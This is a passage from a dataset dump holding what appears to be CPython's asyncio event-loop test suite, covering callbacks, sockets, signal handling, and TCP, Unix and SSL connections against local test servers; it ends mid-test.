source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
test_events.py | """Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv_into(sock, bytearray()))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def _basetest_sock_recv_into(self, httpd, sock):
# same as _basetest_sock_client_ops, but using sock_recv_into
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = bytearray(1024)
with memoryview(data) as buf:
nbytes = self.loop.run_until_complete(
self.loop.sock_recv_into(sock, buf[:1024]))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv_into(sock, buf[nbytes:]))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
sock = socket.socket()
self._basetest_sock_recv_into(httpd, sock)
@support.skip_unless_bind_unix_socket
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_recv_into(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
